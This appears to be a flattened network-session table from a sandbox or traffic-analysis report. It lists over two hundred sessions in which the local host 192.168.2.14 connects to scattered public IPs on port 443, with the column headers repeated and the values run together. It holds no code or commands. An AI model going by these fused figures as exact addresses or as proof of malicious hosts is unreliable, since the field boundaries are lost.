                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18762192.168.2.1456462186.122.169.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18763192.168.2.1441802154.196.213.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18764192.168.2.145771217.53.73.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18765192.168.2.145898299.22.125.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18766192.168.2.1444622116.174.192.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18767192.168.2.1447372107.62.241.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18768192.168.2.1443484101.1.1.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18769192.168.2.1449584184.244.61.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18770192.168.2.1434072189.34.184.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18771192.168.2.1456700101.181.202.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18772192.168.2.144186657.133.143.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18773192.168.2.145469876.227.24.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18774192.168.2.1434328151.4.57.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18775192.168.2.1453660106.118.58.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18776192.168.2.145157483.29.185.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18777192.168.2.145100080.247.8.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18778192.168.2.143442032.75.148.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18779192.168.2.1435230169.224.157.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18780192.168.2.1459054193.160.136.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18781192.168.2.1445344110.91.117.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18782192.168.2.1446642104.224.223.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18783192.168.2.1460642136.18.185.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18784192.168.2.1446656141.244.19.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18785192.168.2.143967452.72.158.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18786192.168.2.144376254.102.252.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18787192.168.2.14472229.176.218.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18788192.168.2.1450784123.248.180.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18789192.168.2.1434434155.18.94.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18790192.168.2.1441082176.204.178.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18791192.168.2.143833488.204.201.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18792192.168.2.144348213.175.1.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18793192.168.2.1438554223.238.12.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18794192.168.2.14444509.230.22.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18795192.168.2.144825079.1.196.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18796192.168.2.1439072201.179.7.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18797192.168.2.1447998122.103.246.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18798192.168.2.145026619.143.199.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18799192.168.2.1444526220.21.106.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18800192.168.2.1457988113.4.16.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18801192.168.2.1445638112.35.255.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18802192.168.2.1456232212.247.163.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18803192.168.2.1450916139.9.62.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18804192.168.2.1434854219.132.185.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18805192.168.2.1433388107.205.71.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18806192.168.2.1434624111.131.93.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18807192.168.2.144818231.183.221.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18808192.168.2.1434748216.164.205.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18809192.168.2.14601145.18.177.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18810192.168.2.1460664171.65.31.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18811192.168.2.1451100154.73.218.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18812192.168.2.143621080.168.135.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18813192.168.2.143339277.1.53.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18814192.168.2.1451880118.52.107.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18815192.168.2.14358368.51.91.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18816192.168.2.1444206119.142.104.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18817192.168.2.1454380116.226.243.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18818192.168.2.1454864177.69.14.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18819192.168.2.1442016190.213.243.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18820192.168.2.1460288121.122.121.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18821192.168.2.1449190147.138.184.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18822192.168.2.143311094.141.66.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18823192.168.2.143846441.15.80.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18824192.168.2.143660269.113.208.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18825192.168.2.1459820146.20.42.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18826192.168.2.145903865.186.97.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18827192.168.2.1459958208.42.183.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18828192.168.2.143676027.192.16.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18829192.168.2.1440930175.98.249.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18830192.168.2.1451174202.95.191.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18831192.168.2.1437884204.71.117.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18832192.168.2.145390039.76.13.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18833192.168.2.1459672156.24.21.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18834192.168.2.144623646.57.61.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18835192.168.2.143776061.72.252.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18836192.168.2.1441414140.42.167.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18837192.168.2.145649497.184.80.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18838192.168.2.1438208173.154.57.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18839192.168.2.1440104146.74.57.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18840192.168.2.1447390181.91.206.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18841192.168.2.143422666.190.187.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18842192.168.2.144441688.101.209.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18843192.168.2.1459156184.212.172.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18844192.168.2.1444152188.123.206.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18845192.168.2.1454102118.112.231.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18846192.168.2.1435364189.149.35.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18847192.168.2.1447912198.21.176.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18848192.168.2.1459410210.239.128.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18849192.168.2.1455164118.13.30.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18850192.168.2.145901679.195.11.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18851192.168.2.1449414156.6.84.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18852192.168.2.1450776105.71.218.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18853192.168.2.145898847.121.83.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18854192.168.2.144481862.104.248.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18855192.168.2.1444996156.160.0.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18856192.168.2.1441466181.217.84.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18857192.168.2.1459398204.136.61.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18858192.168.2.1450294106.14.20.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18859192.168.2.143858831.230.77.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18860192.168.2.1458084177.250.127.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18861192.168.2.143931444.149.236.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18862192.168.2.1432840182.38.87.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18863192.168.2.1457030172.133.19.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18864192.168.2.1445796120.116.118.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18865192.168.2.145035442.227.91.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18866192.168.2.1459352142.104.123.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18867192.168.2.144205445.170.204.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18868192.168.2.1439872172.227.225.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18869192.168.2.1452632132.178.199.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18870192.168.2.1446700130.211.122.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18871192.168.2.1442862220.120.251.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18872192.168.2.146029064.100.100.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18873192.168.2.14570761.12.55.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18874192.168.2.1458512135.151.51.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18875192.168.2.1452908163.140.62.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18876192.168.2.1446994137.237.125.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18877192.168.2.1438610155.215.121.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18878192.168.2.1436504175.153.72.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18879192.168.2.14597429.1.169.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18880192.168.2.144248425.64.91.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18881192.168.2.145943880.6.236.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18882192.168.2.1440806103.62.235.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18883192.168.2.143321452.76.120.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18884192.168.2.14481228.147.208.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18885192.168.2.145242658.3.12.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18886192.168.2.1440504219.213.188.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18887192.168.2.143309497.120.230.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18888192.168.2.1443138126.102.9.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18889192.168.2.1452366171.44.188.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18890192.168.2.1447608176.212.246.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18891192.168.2.146055854.186.166.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18892192.168.2.144036065.182.23.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18893192.168.2.144744669.196.148.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18894192.168.2.1450828189.124.57.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18895192.168.2.1442032208.36.86.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18896192.168.2.144957250.12.124.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18897192.168.2.1458832141.133.9.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18898192.168.2.145698890.103.61.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18899192.168.2.144427880.7.209.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18900192.168.2.145678623.140.219.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18901192.168.2.1438628192.127.43.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18902192.168.2.143425464.18.97.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18903192.168.2.1458622114.209.114.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18904192.168.2.145971290.36.134.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18905192.168.2.143439427.213.184.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18906192.168.2.1447076202.33.72.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18907192.168.2.1436712197.193.18.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18908192.168.2.144656465.178.15.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18909192.168.2.145446614.247.15.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18910192.168.2.1459258166.192.221.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18911192.168.2.144822849.79.36.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18912192.168.2.1454044163.104.246.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18913192.168.2.1433768147.241.118.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18914192.168.2.145636692.178.234.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18915192.168.2.144797675.34.237.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18916192.168.2.143338058.5.56.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18917192.168.2.145697624.137.80.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18918192.168.2.144301031.175.196.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18919192.168.2.144461054.208.65.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18920192.168.2.144159296.51.234.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18921192.168.2.145724662.63.236.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18922192.168.2.1439484200.3.22.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18923192.168.2.144142059.142.95.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18924192.168.2.1459986184.10.25.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18925192.168.2.14438309.124.148.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18926192.168.2.1460444202.105.247.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18927192.168.2.1452806207.129.209.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18928192.168.2.1436330192.70.132.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18929192.168.2.1453164187.14.65.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18930192.168.2.144906250.161.42.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18931192.168.2.1444212181.177.162.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18932192.168.2.1443888121.132.171.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18933192.168.2.146068019.197.145.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18934192.168.2.145467484.28.52.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18935192.168.2.1443952102.252.141.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18936192.168.2.1441242179.100.64.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18937192.168.2.1439842219.39.95.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18938192.168.2.145087853.184.140.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18939192.168.2.143425243.175.125.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18940192.168.2.1453550210.216.82.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18941192.168.2.144607868.135.69.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18942192.168.2.1455416216.145.110.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18943192.168.2.143670241.232.167.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18944192.168.2.143284637.176.149.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18945192.168.2.1441642193.239.52.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18946192.168.2.14542722.16.188.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18947192.168.2.1458110118.29.125.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18948192.168.2.1442558149.148.213.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18949192.168.2.145491470.215.225.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18950192.168.2.1439336130.195.211.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18951192.168.2.1450310115.70.237.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18952192.168.2.143852898.156.130.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18953192.168.2.1458110154.142.102.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18954192.168.2.1460918203.170.210.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18955192.168.2.1445570209.236.45.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18956192.168.2.1457000124.160.139.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18957192.168.2.1452858191.101.172.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18958192.168.2.1438738106.128.89.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18959192.168.2.1432808198.207.63.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18960192.168.2.1446048159.24.9.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18961192.168.2.14461841.90.82.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18962192.168.2.1437254160.88.28.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18963192.168.2.1449086199.200.72.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18964192.168.2.146001451.88.93.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18965192.168.2.143676672.249.252.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18966192.168.2.144067447.189.106.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18967192.168.2.144446845.28.3.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18968192.168.2.1445256177.32.127.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18969192.168.2.1460088138.133.186.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18970192.168.2.1458090138.235.62.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18971192.168.2.1433588174.194.118.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18972192.168.2.1437590158.246.130.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18973192.168.2.1457916165.243.172.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18974192.168.2.1447930162.137.248.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18975192.168.2.145048079.134.78.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18976192.168.2.1434500171.46.39.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18977192.168.2.145636819.79.119.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18978192.168.2.1451620164.127.75.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18979192.168.2.1447630205.158.209.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18980192.168.2.1449340103.150.227.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18981192.168.2.145734296.109.5.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18982192.168.2.14408488.135.32.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
